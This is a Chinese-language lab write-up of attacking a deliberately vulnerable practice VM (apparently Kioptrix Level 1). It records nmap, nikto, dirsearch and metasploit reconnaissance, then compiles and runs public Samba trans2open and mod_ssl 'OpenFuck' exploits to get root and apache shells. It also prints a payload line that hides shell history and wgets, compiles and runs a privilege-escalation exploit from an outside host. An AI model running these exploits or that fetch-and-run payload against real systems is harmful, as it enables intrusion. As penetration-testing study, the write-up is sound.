# 靶场搭建

我用的 VM17,由于靶场是直接封装好的,直接复制进去没有办法获取到 IP 地址,需要手动先配置一下

  1. 不要立即打开,使用记事本打开 VMX 文件,删除所有以 ethernet0 开头的条目并保存
  2. 修改 VirtualHW.version 条目为正确的版本号,如我的 17
  3. 重新导入虚拟机,添加网卡,并修改模式为 NAT

这样就连到虚拟机网络了

IP: 192.168.74.133

# 信息收集

# nmap

C:\WINDOWS\system32>nmap -sV 192.168.74.133 -p- -O
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-06 10:58 中国标准时间
Nmap scan report for 192.168.74.133
Host is up (0.00045s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: jMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:25:FE:E8 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds

开了 ssh,可以尝试爆破

80 端口为 redhat 的测试页面

还开了 Samba 服务,没有看出具体版本号

试一试常用的 Samba 漏洞模块 usermap_script ,没有成功

再扫一扫漏洞

C:\WINDOWS\system32>nmap 192.168.74.133 --script=vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-06 11:09 中国标准时间
Nmap scan report for 192.168.74.133
Host is up (0.0012s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-trace: TRACE is enabled
| http-enum:
|   /test.php: Test page
|   /icons/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|   /manual/: Potentially interesting directory w/ listing on 'apache/1.3.20'
|_  /usage/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.securityfocus.com/bid/70574
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.openssl.org/news/secadv_20140605.txt
|_      http://www.cvedetails.com/cve/2014-0224
| ssl-dh-params:
|   VULNERABLE:
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2015-4000  BID:74733
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.0.x/512-bit MODP group with safe prime modulus
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.securityfocus.com/bid/74733
|       https://weakdh.org
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.0.x/1024-bit MODP group with safe prime modulus
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
1024/tcp open  kdm
MAC Address: 00:0C:29:25:FE:E8 (VMware)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [14]
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103

Nmap done: 1 IP address (1 host up) scanned in 331.29 seconds

看到了 CVE-2009-3103,但是 OS 是 Linux 不是 Windows,所以没有可以利用的漏洞模块

# nikto

┌──(root㉿kali)-[~/Desktop]
└─# nikto -h 192.168.74.133
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.74.133
+ Target Hostname:    192.168.74.133
+ Target Port:        80
+ Start Time:         2024-04-05 23:23:21 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ /: Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ OpenSSL/0.9.6b appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.9.6) (may depend on server version).
+ /: Apache is vulnerable to XSS via the Expect header. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835
+ /manual/: Directory indexing found.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /test.php: This might be interesting.
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpress/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8908 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time:           2024-04-05 23:23:46 (GMT-4) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

有一些误报,说存在后门的、远程执行的都验证了下没有的事

CVE 是一些 XSS,对于靶场来讲没有任何价值

manual 目录需要本地 127.0.0.1 访问,我猜是需要加 Hearder 才能访问

关于 apache 的这些漏洞

+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.

哎我直接去 searchsploit 里面搜得了

# metasploit

nmap 没有扫描出来 samba 具体的版本信息,但是 samba 是高发区,用 metasploit 再试试

msf6 auxiliary(scanner/smb/smb_version) > set RHOST 192.168.74.133
RHOST => 192.168.74.133
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.74.133:139    - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.74.133:139    -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.74.133:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) >

看到了版本信息是 Samba 2.2.1a

搜一下相应的攻击模块,搜出来 6 个

看了一下所有的 target 版本,只有最后一个支持 2.2.1a,那么利用一下,他要爆破地址,等等看结果

等了 J8 十几分钟了没有结果,中间出现过数次 session,但是都 die 了。没辙了

# searchsploit

查一下漏洞

# samba

┌──(root㉿kali)-[~/Desktop]
└─# searchsploit samba 2.2.1a
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Ove | osx/remote/9924.rb
Samba < 2.2.8 (Linux/BSD) - Remote Code Ex | multiple/remote/10.c
Samba < 3.0.20 - Remote Heap Overflow      | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (P | linux_x86/dos/36741.py
------------------------------------------- ---------------------------------
  • 第一个在 metasploit 中已经尝试过了 linux 版本的了,没弹出来 shell,感到困惑,可能是模块不适配新版本的 msf 了
  • 第二个可以尝试进行攻击,测试一下发现是可行的
  • 第三个需要 OS 是不是 RedHat
  • 第四个拒绝服务攻击没有什么价值

# apache

# searchsploit apache 1.3.20
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution                                                                                                            | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner                                                                                                          | php/remote/29316.py
Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure                                                                                                                   | windows/remote/21204.txt
Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access                                                                                                            | windows/remote/19975.pl
Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure                                                                                                                | linux/remote/132.c
Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow                                                                                                                 | multiple/remote/2237.sh
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow                                                                                                                 | linux/dos/41769.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak                                                                                                                           | linux/webapps/42745.py
Apache CouchDB < 2.1.0 - Remote Code Execution                                                                                                                             | linux/webapps/44913.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service                                                                                                                        | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                                                                       | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                                                                                 | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                                                                                 | unix/remote/47080.c
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)                                                                          | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)                                                                                                              | multiple/remote/17691.rb
Apache Tika-server < 1.18 - Command Injection                                                                                                                              | windows/remote/46540.py
Apache Tomcat < 5.5.17 - Remote Directory Listing                                                                                                                          | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal                                                                                                                        | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)                                                                                                                  | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)                                                               | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)                                                               | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC)                                                                                                               | linux/dos/36906.txt
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service                                                                          | php/dos/44057.md
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution                                                                                           | linux/remote/34.pl
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

其中有一些是可能适用的,比如 linux/remote/132.c ,这个查过之后是用来枚举用户的

但是我在这里只需要寻找高价值模块,拿到 shell

# dirsearch

看到开放了 80 端口肯定是要扫一下敏感目录

D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch>dirsearch -u http://192.168.74.133/
dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch\reports\http_192.168.74.133\__24-04-06_11-08-35.txt

Target: http://192.168.74.133/

[11:08:35] Starting:
[11:08:40] 403 -  275B  - /.ht_wsr.txt
[11:08:40] 403 -  278B  - /.htaccess.bak1
[11:08:40] 403 -  278B  - /.htaccess.orig
[11:08:40] 403 -  278B  - /.htaccess.save
[11:08:40] 403 -  280B  - /.htaccess.sample
[11:08:40] 403 -  279B  - /.htaccess_extra
[11:08:40] 403 -  278B  - /.htaccess_orig
[11:08:40] 403 -  276B  - /.htaccess_sc
[11:08:40] 403 -  276B  - /.htaccessOLD
[11:08:40] 403 -  277B  - /.htaccessOLD2
[11:08:40] 403 -  276B  - /.htaccessBAK
[11:08:41] 403 -  268B  - /.htm
[11:08:41] 403 -  269B  - /.html
[11:08:41] 403 -  278B  - /.htpasswd_test
[11:08:41] 403 -  274B  - /.htpasswds
[11:08:41] 403 -  275B  - /.httr-oauth
[11:09:20] 403 -  272B  - /cgi-bin/
[11:09:32] 403 -  268B  - /doc/
[11:09:32] 403 -  283B  - /doc/en/changes.html
[11:09:32] 403 -  272B  - /doc/api/
[11:09:32] 403 -  282B  - /doc/stable.version
[11:09:32] 403 -  283B  - /doc/html/index.html
[11:10:00] 301 -  294B  - /manual  ->  http://127.0.0.1/manual/
[11:10:05] 200 -   17KB - /mrtg/
[11:11:01] 200 -   27B  - /test.php
[11:11:07] 301 -  293B  - /usage  ->  http://127.0.0.1/usage/
[11:11:24] 403 -  273B  - /~operator
[11:11:24] 403 -  269B  - /~root

看到有跳转到 127.0.0.1,我们改一下 X-Forward-For 看一下是什么

usage 页面还是会跳转,不知道原因,知道的老哥可以踢我一下。

manual 页面就不会跳转了,打开一看是个 mod_ssl 的文件夹,估计是个提示,结合 nikto 扫描结果可以知道确定是有一个与此相关的漏洞

# 漏洞利用

# Samba

通过 searchsploit 查找到有一个 RCE 可以利用

将 exp 复制到当前目录下,并使用 gcc 进行编译

searchsploit -m 10.c
gcc -o exp 10.c

编译成功后进行使用

┌──(root㉿kali)-[~/Desktop]
└─# ./exp -b 0 192.168.74.133
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root

拿下 root 权限

# apache

apache 漏洞在 metasploit 中搜了一下,没找到合适的攻击方式

去 searchsploit 中搜了一下有一些,尝试利用

先安装 OpenSSL 库: apt-get install libssl-dev

将源码进行编译,三个 mod_ssl 的只编译出来一个 47080 一个

┌──(root㉿kali)-[~/Desktop]
└─# gcc -o 47080 47080.c -lcrypto
┌──(root㉿kali)-[~/Desktop]
└─# ./47080 0x6b 192.168.74.133

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80fc098
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo 
--01:14:38--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!

Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$ 
bash-2.05$ whoami
whoami
apache

拿到了 apache 权限

至于为什么是 apache 用户呢?因为它里面加载的 payload 是需要连接外部网络下载模块进行编译后才能提权,但是由于 GFW 的原因下载不下来,所以就没有办法进行提权。我们可以尝试手动上传上去之后进行提权,或者直接不用他这个 payload,尝试别的方法进行。

提权模块的下载地址:https://dl.packetstormsecurity.net/0-exploits/ptrace-kmod.c

原 payload:

unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-d.c; ./exploit;

通过提权就可拿到 root 权限。

# 小结

靶场打的还是有一些混乱没有章法,主要是我想要组成 windows 的工具包,在 win 下和 kali 下的攻击模式还是有一些差异。

通过信息收集的结果没有进行汇总,总是想到哪里做到哪里,这个方法一定是存在问题的。

跟编程相关的漏洞执行能力太差劲,没有办法自己编写漏洞脚本,甚至看懂也不太行,这方面做的太少了,要加强编程能力。提高工具数量度。

对于这种攻击模式还是太过陌生了。

在之后的靶场练习当中,争取将首次信息收集环节和漏洞利用环节完全分隔开,,在信息收集完成后,做一次汇总先。

这些靶场实在是不适合 win 下进行,还是使用 kali 进行舒服些,之后还是切到 kali 上作为主要环境吧。